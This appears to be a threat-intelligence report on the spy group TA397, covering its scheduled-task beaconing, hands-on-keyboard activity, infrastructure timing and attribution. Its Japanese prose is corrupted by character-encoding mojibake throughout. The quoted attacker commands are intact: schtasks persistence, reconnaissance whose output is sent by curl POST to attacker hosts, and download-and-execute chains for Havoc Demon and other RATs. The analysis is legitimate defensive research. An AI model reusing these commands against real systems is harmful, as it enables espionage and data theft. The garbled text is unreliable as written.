- Subject DNïŒèšŒææžã®å¯Ÿè±¡èå¥åïŒïŒCN=*.<ãã¡ã€ã³å>
- Issuer DNïŒçºè¡è èå¥åïŒïŒC=US, O=Letâs Encrypt, CN=R[0-9]+
- æå¹æéïŒ90æ¥é
ãããã®ç¹åŸŽã¯ãTA397ã«ããåæã¢ã¯ã»ã¹ã®ææ³ãæ€åºããããã§ã®æåãªææšãšãªããŸããããªãã¡ãã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ã®äžè²«ãã䜿çšãç¹å®ã®PHP URLãã¿ãŒã³ã被害è ã®ã³ã³ãã¥ãŒã¿ãŒåãšãŠãŒã¶ãŒåã®ããŒã³ã³éä¿¡ãžã®å«æããããŠLetâs EncryptèšŒææžã®ãµãŒããŒäžã§ã®äœ¿çšãšãã£ãèŠçŽ ããç·åçã«TA397ã®æŽ»åã§ãããšé«ã確床ã§ç€ºåããŸãã

TA397ã®ã¹ã±ãžã¥ãŒã«ãããã¿ã¹ã¯ãšã€ã³ãã©ã®ãã£ã³ã¬ãŒããªã³ã
ãã³ãºãªã³ã»ããŒããŒãã»ã¢ã¯ãã£ããã£
ç§ãã¡ã®èª¿æ»äžã«ãTA397ããhands-on-keyboardïŒæåæäœïŒãã«ããæŽ»åãè¡ã£ãŠããæ§åã確èªãããŸãããå ·äœçã«ã¯ãåã°ã«ãŒãããªã¢ãŒãã¢ã¯ã»ã¹åããã€ã®æšéЬïŒRATïŒã1ã€é 眮ããåŸãã»ã©ãªãããŠ2ã€ç®ã®RATãæå ¥ããŠããããšã芳枬ãããŸãããããã¯ãæ»æè ãã€ã³ãã®éåžžã®å€åæéåž¯ã«æåã§æäœããŠããå¯èœæ§ã極ããŠé«ããšèããããŸãã
ãã®ç¹ã«ã€ããŠã¯ããã«ãŒããã€ã³ãã以åã«å ¬éããTA397ã«é¢ããããã°èšäºã§ããwmRATããã³MiyaRATã®æåã«ãããããã€ã¡ã³ãã«é¢ããŠè©³è¿°ããŠããŸãããã以æ¥ãç§ãã¡ã¯æ¿åºæ©é¢ãæšçãšãã2ã€ã®ç°ãªããã£ã³ããŒã³ã«ãããŠãTA397ãæåæäœãè¡ã£ãŠããäºäŸã芳枬ããŸããã
1ã€ç®ã®ã±ãŒã¹ã¯ãå ã«è§ŠããSearch Connectorãã¡ã€ã«åœ¢åŒãçšãããã£ã³ããŒã³ã§ãåã°ã«ãŒãã¯ãã®æ°ããææ³ãå©çšããŠãæšçãã·ã³äžã«ã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ãããŒãããLNKãã¡ã€ã«ãããããããŠããŸããã
"C:\\Windows\\System32\\cmd.exe" /start min /c schtasks /create /tn "OneDrive\\OneDrive Standalone Update Task-S-1-5-21-9920643986-2299988379" /f /sc minute /mo 19 /tr "conhost --headless cmd /v:on /c set 765=ht& set 665=tp:& set 565=!765!!665!& set 465=!565!//46.229.55[.]63& curl !465!/sv^c^h.p^h^p?li=%computername%..%hostname%c^m^d"& msg * "ERROR 0XA008CE : ERROR reading File, contents are corrupted."
ãã®LNKãã¡ã€ã«ã¯ãcmd.exeã䜿çšããŠãOneDrive\OneDrive Standalone Update Task-S-1-5-21-9920643986-2299988379ããšããååã®ã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ãäœæããconhost.exeãçšããŠ19åããšã«æ¬¡ã®ã¹ããŒãžã®ãã€ããŒããããŠã³ããŒãããã³å®è¡ããããšãããã®ã§ããã
ãã®ããã«ããã®ã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ã¯ãæšçãšãªã£ããã·ã³ã®æ å ±ïŒã³ã³ãã¥ãŒã¿ãŒåãšãŠãŒã¶ãŒåïŒãå«ãã curlãªã¯ãšã¹ãã hxxp://46.229.55[.]63/svch[.]php?li=%computername%..%username% ã«éä¿¡ããŠããŸããã
ãŸãããã®ã¿ã¹ã¯ã¯ããŠãŒã¶ãŒã«å¯ŸããŠãå ã®ãã¡ã€ã«ã¯è¡šç€ºã§ããŸããããšããåœã®ãšã©ãŒã¡ãã»ãŒãžã衚瀺ããæ£èŠãã¡ã€ã«ã«èŠããããçŽ°å·¥ãæœãããŠããŸããã
ãã®ã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ã¯ã18æéã«ãããããŒã³ã³éä¿¡ãè¡ã£ãŠããŸããããæçµçã«ãã«ãŒããã€ã³ããTA397ããã®å¿çãåããŠç¢ºèªããã®ã¯ãåå®äžçæïŒUTCïŒã§05:27ïŒã€ã³ãæšæºæã§ã¯10:57ïŒã§ããã
HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 05:27:59 GMT Server: Apache/2.4.62 (Ubuntu) Content-Length: 330 Content-Type: image/jpeg Cache-Control: no-cache cd C:\\programdata dir > abc1.pdf tasklist >> abc1.pdf wmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get >>abc1.pdf wmic logicaldisk get caption >> abc1.pdf systeminfo >> C:\\programdata\\abc1.pdf curl -X POST -F "file=@C:\\programdata\\abc1.pdf" <hxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%username%> del abc1.pdf
ãã®æ å ±åéåŠçïŒãšãã¥ã¡ã¬ãŒã·ã§ã³ïŒã¯ããã«ãŒããã€ã³ãã以åã®TA397ã«é¢ããããã°èšäºã§è©³çްã«èª¬æãããã®ãšã»ãŒåäžã§ãããéããšããŠã¯ systeminfo ã³ãã³ãã远å ãããŠããç¹ãæããããŸãã
ãã®ãªã¯ãšã¹ãã«ãããŠãæ»æè ã¯æšçãã·ã³ã®æ å ±ãå«ãPOSTãªã¯ãšã¹ãããã¹ããŒãžã³ã°ãã¡ã€ã³äžã®å¥ã®PHPãšã³ããã€ã³ããããªãã¡ /svupfl[.]php?oi=%computername%_%username% ã«å¯ŸããŠéä¿¡ããŸããã
ãããŠãã®18ååŸãç§ãã¡ã¯ä»¥äžã®ãªã¯ãšã¹ãã芳枬ããŸããã
HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 05:46:59 GMT Server: Apache/2.4.62 (Ubuntu) Content-Length: 381 Content-Type: image/jpeg Cache-Control: no-cache cd C:\\programdata set /P ="MZ" < nul >> sh1.txt" curl -o sh2.txt <hxxp://173.254.204[.]72/sh2.txt> copy /b sh1.txt+sh2.txt shh.exe curl -o dune64.log <http://173.254.204[.]72/dune64.log> ren dune64.log dune64.bin shh.exe dune64.bin dir > abc1.pdf tasklist >> abc1.pdf curl -X POST -F "file=@C:\\programdata\\abc1.pdf" <hxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%username%> del abc1.pdf
ãã®ã±ãŒã¹ã§ã¯ãTA397ã®ãªãã¬ãŒã¿ãŒã誀ã£ãŠ curl ã³ãã³ãã䜿çšããhxxp://173.254.204[.]72/dune64.log ãããã€ããŒããååŸããããšããŸããããããããã®ãªã¯ãšã¹ãã¯404ãšã©ãŒã§è¿ãããŸããããšããã®ããæ»æè ããã®ååã®ãã¡ã€ã«ããµãŒããŒäžã«é 眮ããŠããªãã£ãããã§ãããã®çµæããªããŒã ã³ãã³ããš shh.exe ã®å®è¡ã¯å€±æã«çµãããŸããã
ãšããããå®éã«ã¯æ¬¡ã®ã¹ããŒãžã®ãã€ããŒã㯠/dune64.bin ã«ååšããŠããŸããããã«ãŒããã€ã³ãã®ã¢ããªã¹ãã shh.exe ãã€ããŒããš dune64.bin ãã€ããªãçµã¿åãããŠå®è¡ãããšãããäžé£ã®ææãã§ãŒã³ã¯æ£åžžã«åäœããŸããã
ãããã®ãã€ããŒããåæããçµæãshh.exe 㯠KugelBlitzãdune64.bin 㯠Havoc C2 ãã¬ãŒã ã¯ãŒã¯ã® DemonãšãŒãžã§ã³ã ã§ããããšã倿ããŸããããã®ããªã¢ã³ãã¯ãããŒã443ã䜿çšã㊠72.18.215[.]108 ãšéä¿¡ããŠããããšã確èªãããŸããã
æ»æè ãæåã«ããã¯ãã¢ã®ããŒãã«å€±æããåŸã08:57 UTCïŒã€ã³ãæšæºæ14:27ïŒã«ãå¥ã®ãªã¯ãšã¹ãã確èªãããŸããã
HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 08:57:00 GMT Server: Apache/2.4.62 (Ubuntu) Content-Length: 263 Content-Type: image/jpeg Cache-Control: no-cache cd C:\\programdata net use Z: \\\\72.18.215[.]1\\tempy Z: Z:\\shl.exe dune64.bin C: net use /delete Z: /y whoami dir > abc1.pdf tasklist >> abc1.pdf curl -X POST -F "file=@C:\\programdata\\abc1.pdf" <hxxp://46.229.55[.]63/svupfl.php?oi=%computername%_%username%> del abc1.pdf
ãã®ã±ãŒã¹ã§ã¯ãTA397ã¯çŽ3æéåãšåæ§ã®ææãã§ãŒã³ãåã³å®è¡ããããšããŸããããä»åã¯æ»æè ã管çããå¥ã®ãµãŒããŒãããã¹ãŠã®ãã€ããŒããååŸããæ¹æ³ãéžæããŸããããã®éãtempy ãšããååã®SMBå ±æãããŠã³ãããããšã§ããã€ããŒãã®ååŸãè¡ãããŸããããã«ãŒããã€ã³ãããã®å ±æãã©ã€ãã調æ»ãããšãããTA397ãåãã©ã€ãäžã«wmRATããã³MiyaRATã®ãã€ããŒããä¿åããŠããããšã倿ããŸããããããã¯ã2024幎12æã«ãã«ãŒããã€ã³ãããã°ã§åãäžãããã®ãšåäžã®ãã€ããªã§ããããã«ãTA397ã®ãã©ã€ãå ã«ã¯ã被害è ããçªåãããå¯èœæ§ã®ãã2ã€ã®ææžãèŠã€ãããŸããã
1ã€ç®ã®ææžã¯ããã³ã°ã©ãã·ã¥æ¿åºãçºè¡ããå ¬åŒã®çšåæžé¡ã®ã¹ãã£ã³ã³ããŒã§ããããã®ææžã«ã€ããŠã¯ãå¿åæ§ãšå®å šæ§ãèæ ®ããããã°äžã§ã¯å 容ãäŒããŠããŸãã2ã€ç®ã¯ããã³ã°ã©ãã·ã¥ã®è»äºçµç¹ã«ç±æ¥ãããšèŠãããæŠç¥çãªè»äºææžã§ããããã¡ããå ¬éã¯æ§ãã倿ãããŠããŸããäž¡ææžã¯ãããããææžãã®è³æãã³ããŒãŸãã¯ã¹ãã£ã³ãããã®ã§ãããšèŠãããæ£èŠã®ãã®ã§ããå¯èœæ§ãé«ãããŸãTA397ããããã®è¢«å®³è ããå®éã«ããŒã¿ãçªåããå¯èœæ§ãéåžžã«é«ããšèããããŸãããã®ãããªæšçã¯ãTA397ã®éå»ã®æŽ»ååŸåãšäžèŽããŠãããäž¡çµç¹ãåã°ã«ãŒãã«ããã¹ãã€æŽ»åã®ç¶ç¶çãªæ å ±åéã®å¯Ÿè±¡ã§ããããšãè£ä»ããŠããŸãã
ãã«ãŒããã€ã³ãã芳枬ãããã1ã€ã®ãhands-on-keyboardïŒæåæäœïŒãã«ããæŽ»åäºäŸã¯ãåã°ã«ãŒãããã䜿çšããææãã§ãŒã³ã§ããCHMãã¡ã€ã«ãçšãããã®ã§ããã
ãã®æ»æã¡ãŒã«ã¯ãä»ã®åä¿¡è ãšã®ã¹ã¬ããã®äžéšãè£ ã£ãŠãããæ·»ä»ãã¡ã€ã«ã®æ£åœæ§ãé«ããããšãã工倫ãèŠãããŸãããã¡ãŒã«ã«ã¯RAR圢åŒã§å§çž®ãããCHMãã¡ã€ã«ãæ·»ä»ãããŠããããŠãŒã¶ãŒãããã«ã¯ãªãã¯ããŠå®è¡ãããšãCHMãã¡ã€ã«ã«ãã£ãŠMSTaskUIãšããååã®ã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ãèšå®ãããconhost.exe ãçµç±ããŠPowerShellãå®è¡ãã16åããšã« curl ã䜿çšããŠæ¬¡ã®ã¹ããŒãžã®ãã€ããŒããããŠã³ããŒãããã³å®è¡ããããšããä»çµã¿ã«ãªã£ãŠããŸããã
"C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping localhost > nul & schtasks /create /tn "MSTaskUI" /f /sc minute /mo 16 /tr "conhost --headless powershell -WindowStyle Minimized irm "utizviewstation[.]com/sdf.php? fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile "C:\\Users\\public\\documents\\vfc.cc"; Get-Content "C:\\Users\\public\\documents\\vfc.cc" | cmd"
ãã«ãŒããã€ã³ãã¯ã2024幎10:40 UTCïŒã€ã³ãæšæºæ16:20ïŒã«ãTA397ã®ãªãã¬ãŒã¿ãŒãå®è¡äžã®ã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ããã®ãªã¯ãšã¹ãã«å¯Ÿããæåã³ãã³ãã§å¿çããŠããæ§åã確èªããŸããããã®ãšãæ»æè ã¯ãæšçãã·ã³ã®æ å ±ãåéããã³ãã³ããçºè¡ãããã®æ å ±ãå«ãã POSTãªã¯ãšã¹ããéä¿¡ããŸãããããã¯ãæšçãšãªã£ãã·ã¹ãã ã®è©³çŽ°ãææ¡ããäžã§ã以éã®æ»æè¡åïŒæ¬¡ã®ã¹ããŒãžã®ãã€ããŒãé ä¿¡ãªã©ïŒã決å®ããããã®æäœãšèããããŸãã
tree "%userprofile%\\Desktop" /f > C:\\Users\\Public\\Documents\\d.log systeminfo >> C:\\Users\\Public\\Documents\\d.log WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName,productState /Format:List >> C:\\Users\\Public\\Documents\\d.log wmic logicaldisk get name >> C:\\Users\\Public\\Documents\\d.log cd C:\\Users\\Public\\Documents curl -X POST -F "file=@d.log" hxxps://www.utizviewstation[.]com/urf.php?mn=%computername% del d.log
ãããŸã§ã«èŠ³æž¬ãããŠããTA397ã®ãhands-on-keyboardïŒæåæäœïŒã掻åãšåæ§ã«ãææãããã·ã³ã®æ å ±ãå«ãPOSTãªã¯ãšã¹ãã¯ãåãã¹ããŒãžã³ã°ãã¡ã€ã³ã«éä¿¡ãããŸããããã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ã§äœ¿çšããããã®ãšã¯ç°ãªãPHP URIïŒ/urf.php?mn=%computername%ïŒã䜿çšãããŠããŸããããã«ãŒããã€ã³ãã¯ãTA397ãææãã·ã³ã®ã·ã¹ãã æ å ±ã«åºã¥ããŠã次ã®ã¹ããŒãžã®ãã€ããŒããæäžãããã©ããã倿ããŠããæ§åã確èªããŠããŸããã€ãŸããã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ããã¹ããŒãžã³ã°ãã¡ã€ã³ãžéä¿¡ãããã³ã³ãã¥ãŒã¿ãŒåããã®ä»ã®æ å ±ã¯ãäœããã®äºåãã£ã«ã¿ãªã³ã°åŠçãåããŠãããšèããããŸãã
ãã®éžå®åºæºã¯ãTA397ãéå»ã«äœ¿çšããŠãã ArtraDownloader ã«é¢ããå ±åã§ææãããå 容ãšé¡äŒŒããŠãããåã°ã«ãŒããã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ã®ææ³ãç¶ç¶çã«çšããäžæ¹ã§ãåæã¢ã¯ã»ã¹ææ³ãæçµãã€ããŒããå€åãããŠããçç±ã®1ã€ãšèããããŸãã
ããããéžå®åºæºã¯ãTA397ã®å šäœçãªæ»æããã»ã¹ã«ãããŠæ¥µããŠéèŠãªèŠçŽ ã§ãããåã°ã«ãŒãã®ã¹ãã€æŽ»åãããã«ç²Ÿå¯ãã€å¯Ÿè±¡ãå³éžããæ§è³ªã®ãã®ã§ãããã瀺ããŠããŸãã
ãããŠã13:37 UTCïŒã€ã³ãæšæºæ19:07ïŒã«ãç§ãã¡ã¯æ»æè ã®ãµãŒããŒããã®ä»¥äžã®å¿çã芳枬ããŸããã
curl -o C:\\ProgramData\\msuitl.tar hxxp://utizviewstation[.]com/msuitl.tar cd C:\\ProgramData tar -xvf msuitl.tar dir > t0.log msuitl.exe tasklist >> t0.log curl -X POST -F "file=@t0.log" hxxps://www.utizviewstation[.]com/urf.php?mn=%username% del t0.log
ãã®ãªã¯ãšã¹ãã¯ããã¡ã€ã³äžã® /msuitl.tar ãšã³ããã€ã³ãã«å¯ŸããŠéä¿¡ãããæçµãã€ããŒãã®ããŠã³ããŒããåŒãèµ·ãããŸããã
HTTP/1.1 200 OK Connection: Keep-Alive Keep-Alive: timeout=5, max=100 content-type: application/x-tar last-modified: Mon, 03 Feb 2025 11:23:10 GMT accept-ranges: bytes content-length: 45568 date: Mon, 03 Feb 2025 13:37:21 GMT server: LiteSpeed Cache-Control: no-cache msuitl.exe
ã¬ã¹ãã³ã¹ããããŒãã確èªãããããã«ããã®ãšã³ããã€ã³ãïŒ/msuitl.tarïŒã¯ãææãã·ã³ã®ååãšãã¥ã¡ã¬ãŒã·ã§ã³ïŒæ å ±åéïŒãã43ååŸã«å€æŽãããŠãããããã¯TA397ãã¹ããŒãžã³ã°ã€ã³ãã©ã«å¯ŸããŠãéžå®æžã¿ã®ãã€ããŒããæå³çã«ããŒãããããšã瀺åããŠããŸãã
ãã®ããšããããã€ããŒãã®éžå®ã¯æšçã®éžå®ãšå¯æ¥ã«é¢é£ããŠãããæåã®ãšãã¥ã¡ã¬ãŒã·ã§ã³ã§åŸãããæ
å ±ã«åºã¥ããŠè¡ãããå¯èœæ§ãé«ããšèããããŸãã
ãã®ãã£ã³ããŒã³ã«ãããæçµãã€ããŒã㯠BDarkRAT ã§ããããšã倿ããŠããããã®ãã«ãŠã§ã¢ã®è©³çްã¯ãThreatrayã®ããã°ã«æ²èŒãããŠããæ¬èšäºã®ããŒã2ã§ç¢ºèªã§ããŸãã
TA397ã®åæäŸµå ¥ææ³ã¯äžè²«ããŠã¹ãã¢ãã£ãã·ã³ã°ã¡ãŒã«ã§ãããäŸµå ¥ãã§ãŒã³ã®ååéšåã«ã¯ããã€ãã®æè¡çããªãšãŒã·ã§ã³ãååšããŸããããã«ãããããããåã°ã«ãŒããå±éãããã«ãŠã§ã¢ãã€ããŒãã®å€æ§æ§ã¯éåžžã«åºç¯å²ã«ããã£ãŠãããæ³šç®ã«å€ããŸãã
以äžã®å³ã¯ãTA397ã«ãããhands-on-keyboardïŒæåæäœïŒãã®æŽ»åããã€ã³ãæšæºæïŒISTïŒã®æææ¥ããéææ¥ã®éåžžå€åæéã«éäžããŠããããšã瀺ãã¿ã€ã ã¹ã¿ã³ãã®ååžããããããããã®ã§ãã

芳枬ããããhands-on-keyboardïŒæåæäœïŒã掻åã®ã¿ã€ã ã¹ã¿ã³ãã瀺ãããŒãããã
ã€ã³ãã©åæ
ã¿ã€ã ãŸãŒã³åæã¯ãã¢ãžã¢ã®ã¹ãã€ã°ã«ãŒãã ãã§ãªãã2020幎ã«Bitdefenderã«ãã£ãŠå®èšŒãããããã«ãTA397ã«ç¹åããã¹ãã€ã°ã«ãŒãã®ã¢ããªãã¥ãŒã·ã§ã³ãç¹å®ããããã®æåããæ¹æ³ã§ããããšã蚌æãããŠããŸãã Bitdefenderã®èª¿æ»ã§ã¯ãTA397ãã«ãŠã§ã¢ã§äœ¿çšãããã³ãŒã眲åèšŒææžã®äœæã¿ã€ã ã¹ã¿ã³ãããµã³ãã«ã®ZIPãã¡ã€ã«ã®ã¿ã€ã ã¹ã¿ã³ããåæããçµæãã€ã³ãæšæºæïŒUTC +5:30ïŒã«ãããã³ã°ããã9æãã5æãŸã§ãæææ¥ããéææ¥ãŸã§ã®äœæ¥ã¹ã±ãžã¥ãŒã«ã«åŸã£ãŠããããšã倿ããŸããã
ãã®èª¿æ»ã®ããã«ãæã ã¯ãå éšãã¬ã¡ããªããããããããã³å ¬éå ±åæžãããTA397 ã® C2 ããã³ã¹ããŒãžã³ã°ã»ãã¡ã€ã³ïŒã°ã«ãŒããæåã«å ¬è¡šãããŠããæ°å¹Žã«ãããæ¢ç¥ã® 122 åã®ãã¡ã€ã³ïŒãåéããŸããã åãã¡ã€ã³ïŒå ¥æå¯èœãªå ŽåïŒã«ã€ããŠã以äžã®3ã€ã®ã¿ã€ã ã¹ã¿ã³ããåéããŸããïŒ
- ããã·ãDNSã®åèŠã¿ã€ã ã¹ã¿ã³ã
- WHOISããŒã¿ããã®ãã¡ã€ã³äœæã¿ã€ã ã¹ã¿ã³ã
- Let's EncryptèšŒææžããã®TLSèšŒææžäœæã¿ã€ã ã¹ã¿ã³ã
ããŒã¿äŸïŒ
|
ãã¡ã€ã³ |
ãã£ã³ããŒã³å¹Žææ¥ |
Passive DNS |
WHOIS |
Certificate |
Staging URL |
|
blucollinsoutien[.]com |
2025-04-01 |
2025-03-11 13:09:43 IST |
2025-03-11 13:06:44 IST |
2025-03-11 13:08:45 IST |
/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME |
|
princecleanit[.]com |
2025-03-26 |
2025-01-03 14:16:21 IST |
2025-01-02 15:27:04 IST |
2025-01-02 15:30:00 IST |
/dprin.php?dr=COMPUTERNAME;USERNAME |
ãã¹ãŠã®ã¿ã€ã ã¹ã¿ã³ããã€ã³ãæšæºæïŒISTïŒã«å€æããåŸãåããŒã¿ãœãŒã¹ããšã«3ã€ã®ããŒãããããäœæããŸããã ããèŠããããããããæšæºçãªãåŽåæéããç¹ç·ã§ç€ºããŸããã ããŒã¿ã¯ã»ãŒãã®ãã¿ãŒã³ã«äžèŽããŠããããå°ãªããšãæç¢ºãªåŸåã瀺åããŠããŸãã
Passive DNS:

ããã·ãDNSã®æåã«èŠãã¿ã€ã ã¹ã¿ã³ãã®ããŒãããã
ãã¡ã€ã³ç»é²ãšãããã·ãDNSããŒã¿ããŒã¹ã«èšé²ãããæåã®ã¿ã€ã ã¹ã¿ã³ãã®éã«ã¯ãããŸããŸãªçç±ã§é å»¶ãçºçããå¯èœæ§ããããããç°åžžå€ã®ååšã¯äºæ³å€ã§ã¯ãããŸããã
WHOIS:

WHOISãã¡ã€ã³ç»é²ã¿ã€ã ã¹ã¿ã³ãã®ããŒãããã
WHOISããŒã¿ã¯ãã¡ã€ã³ç»é²ã«é¢ããæ å ±ãæäŸããŸãã ãã®èª¿æ»ã§ã¯ãWHOIS databaseãçŽæ¥ç §äŒããŸããã éå»ã®ããŒã¿ã䜿çšããŠããããã調æ»ã«å«ãŸãããã¹ãŠã®ãã¡ã€ã³ã«ã€ããŠããã¡ã€ã³äœææ¥ãåžžã«å ¥æã§ãããšã¯éããŸããïŒãã¡ã€ã³ã®æå¹æéãåããåŸã«ããŒã¿ããŒã¹ããåé€ããããªã©ïŒã ããŒã¿ãèŠããšãéææ¥ã®ãã©ã³ãã¿ã€ã ããéç«ã£ãŠãããè¡çºè ãåãæ¥ã«æ°å以å ã«è€æ°ã®ãã¡ã€ã³ãç»é²ããŠããããšãããããŸãã è«ççã«ã¯ãããã¯ãã€ã³ãã©ã¹ãã©ã¯ãã£ãŒããŒã ã®ã¡ã³ããŒããäžåºŠã«1ã€ã®ãã¡ã€ã³ãç»é²ããã®ã§ã¯ãªãã1ã€ã®ãã»ãã·ã§ã³ãã§è€æ°ã®ãã¡ã€ã³ãç»é²ããå¯èœæ§ãé«ãããšã瀺åããŠããŸãã
Certificate:

ã¿ã€ã ã¹ã¿ã³ãããæå¹ãªLet's EncryptèšŒææžã®ããŒãããã
ãã®èª¿æ»ã§ã¯ãCensysã䜿çšããŠåãã¡ã€ã³ã«é¢é£ããTLSèšŒææžãç¹å®ããèšŒææžã®äœæã¿ã€ã ã¹ã¿ã³ããç §äŒããŸããã Let's Encryptã®èšŒææžã䜿çšãããŠããããŒã¿ãã€ã³ãã®ã¿ã察象ãšããŠããŸãã ç§ãã¡ãçŽé¢ãã課é¡ã® 1 ã€ã¯ãéå»ã® C2 ãã¡ã€ã³ãšã¹ããŒãžã³ã°ãã¡ã€ã³ã®äžã«ã¯ãæå¹æéãåãããåç»é²ããããããŠããã¯ãã¢ã¯ãã£ãã§ãªããã®ããã£ããããæ£ç¢ºãªåæã確å®ã«è¡ãã«ã¯æ£ãã Let's Encrypt èšŒææžãéžæããããšãéèŠã§ãã£ãããšã§ãã ã¬ãžã¹ãã©ããããã€ãã®äžã«ã¯ãæéåãã®èšŒææžãèªåçã«æŽæ°ãããµãŒãã¹ãããã¡ã€ã³ç»é²æã«TLSèšŒææžãçºè¡ãããµãŒãã¹ãæäŸããŠãããšããããããŸãã ãã®èª¿æ»ã§åæãããã¡ã€ã³ã¯ãããŸããŸãªãã¹ãã£ã³ã°ãããã€ãã«ãŸããã£ãŠããŸãã
ãã¹ãŠã®ããŒã¿ãœãŒã¹ã1ã€ã®ããŒããããã«ãŸãšãããšã次ã®ãããªçµæã«ãªããŸãïŒ

ããã·ãDNSãWHOISãèšŒææžã®ã¿ã€ã ã¹ã¿ã³ããçµã¿åãããããŒãããã
ãã¡ã€ã³ã®äœæãšTLSèšŒææžã®çºè¡ã«ã¯ãç®ã«èŠããã°ãã€ãããããŸãã 以äžã¯2ã€ã®ããŒã¿äŸã§ã1ã€ã¯C2ãã¡ã€ã³ããã1ã€ã¯ã¹ããŒãžã³ã°ã»ãã¡ã€ã³ã§ã察å¿ããTLSèšŒææžãçºè¡ãããæ°æ¥åã«ãã¡ã€ã³ãç»é²ãããŠããŸãã é¢é£ãããã£ã³ããŒã³æŽ»åã¯ããã®æ°æ¥åŸã«éå§ãããŠããŸãã ã¿ã€ã ã¹ã¿ã³ãã¯ãã¹ãŠã€ã³ãæšæºæãšäžèŽããŠãããã€ã³ãã©é¢é£ã®æŽ»åã®ã»ãšãã©ãããã®ã¿ã€ã ãŸãŒã³ã®æšæºçãªå¶æ¥æéäžã«çºçããŠããããšãæç¢ºã«ç€ºãããŠããŸãã
|
ãã¡ã€ã³ |
Passive DNS |
WHOIS |
Certificate |
Source / Campaign |
|
utizviewstation[.]com |
2025-01-03 17:04:43 IST |
2025-01-03 14:31:26 IST |
2025-01-06 16:16:55 IST |
First seen in Campaign data: 2025-02-03, Staging URL: /sdf.php?fv=$env:COMPUTERNAME*$env:USERNAME |
|
ottawadesignlab[.]com |
2024-08-25 16:23:26 IST |
2024-08-23 12:23:49 IST |
2024-09-27 12:32:13 IST |
Mentioned as C2 in https://www.ctfiot.com/211062.html
|
ã¢ããªãã¥ãŒã·ã§ã³ïŒæ»æè ã®çŽã¥ãïŒ
åœå®¶ã®æ¯æŽãåããã¹ãã€æŽ»åã®ã¢ããªãã¥ãŒã·ã§ã³ã¯åžžã«é£é¡ã§ãã ããããè¡çºè ã®æŽ»åã®æ§ã ãªåŽé¢ã«ãããè€æ°ã®ã·ã°ãã«ã®åæµãåæããããšã§ã芳å¯ãããæŽ»åã®åæ©ãšèµ·æºã«ã€ããŠè©äŸ¡ãäžãããšãã§ããŸãã
TA397ã¯ã¹ãã€æŽ»åã«ç¹åããè åšè¡çºè ã§ãããã€ã³ãã®è«å ±çµç¹ã®ããã«æŽ»åããŠããå¯èœæ§ãé«ããšèããããŸãããã¬ã¡ããªãŒæž¬å®ã«ãããšãTA397ã¯äž»ã«ä»¥äžãæšçãšããŠããŸãã
ç¹ã«äžåœãããã¹ã¿ã³ããã®ä»ã€ã³ãäºå€§éžã®è¿é£è«žåœãšã®é¢ä¿ãå©å®³é¢ä¿ãæã€å£äœã«éç¹ã眮ããŠããŸãã
ããã¬ã¹ã«ã«ãã¢ãŒãªã·ã£ã¹ãªã©ã®å€åœã®æ¿åºæ©é¢ãå€§äœ¿é€šãæ¿åºæ©é¢ãè£ ã£ãŠããããšã¯ãTA397ããããã®åœã®æ£åœãªæ¥åã«é¢ããç¥èãæããŠããã ãã§ãªãããã®ç¥èãæªçšããŠã¹ãã¢ãã£ãã·ã³ã°æ»æã®æ£åœæ§ã匷åããŠããããšã瀺ããŠããŸããããã«ãå éšãŸãã¯å€åœã®æ¿åºäºåã«é¢ããæ£åœãªææžãåœè£ ææžãä»¶åãæ¬æå 容ã䜿çšããŠããããšã¯ãTA397ãæ¿åºã®æšæºçãªå®åã«éåžžã«ç²ŸéããŠããããšã瀺ããŠããŸãããã³ã°ã©ãã·ã¥ã®è»éãçšååœå±ããçºè¡ãããå¯èœæ§ã®ããæ£åœãªå éšææžãä¿æããŠããããšã¯ãTA397ãã€ã³ãã®åœå®¶å©çã®ããã®æ å ±ã«åºã¥ãä»»åãå®è¡ããŠãããšã®è©äŸ¡ãšäžèŽããŠããŸãã
ããŒããŒãæäœæŽ»åã«é¢ãããã«ãŒããã€ã³ãã®èŠ³æž¬çµæã«ãããšãæåã®èŠ³æž¬äºäŸã§ã¯ãTA397ã®å¿çã¯ãæ°æéã«ãããäŒæ¢ç¶æ ã®ã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ããŒã³ã³éä¿¡åŸã«ãUTC 05:27ã«éå§ããããã®åŸãUTC 05:46ãšUTC 08:57ã«è¿œè·¡æŽ»åã芳枬ãããŸããã2çªç®ã®äºäŸã§ã¯ã掻åã¯UTC 10:40ã«éå§ãããŸãããTA397ã®ãµãŒããŒã«ããã倿Žã¯UTC 11:27ã«èгå¯ãããæçµçãªãã©ããŒã¢ãããã€ããŒãã®é ä¿¡ã¯UTC 13:37ã«ç¢ºèªãããŸãããããã¯ãã€ã³ãæšæºæïŒISTïŒãŸãã¯é¡äŒŒã®ã¿ã€ã ãŸãŒã³ã«èª¿æŽããå ŽåãTA397ãåã¢ãžã¢èµ·æºã®æ»æã°ã«ãŒãã§ãããšããå ¬éè©äŸ¡ãšäžèŽããŠããŸãããã ããTA397ã®åºç¯ãªã€ã³ãã©ã¹ãã©ã¯ãã£ã®åæãããã°ã«ãŒããåŸãéçšãã¿ãŒã³ãæããã«ãªã£ãŠããŸããã€ã³ãã©ã¹ãã©ã¯ãã£é¢é£ã®æŽ»åã®ã»ãšãã©ããISTã¿ã€ã ãŸãŒã³ã®æšæºæ¥åæéäžã«çºçããŠããããšãæç¢ºã«ç€ºãããŠããŸãã
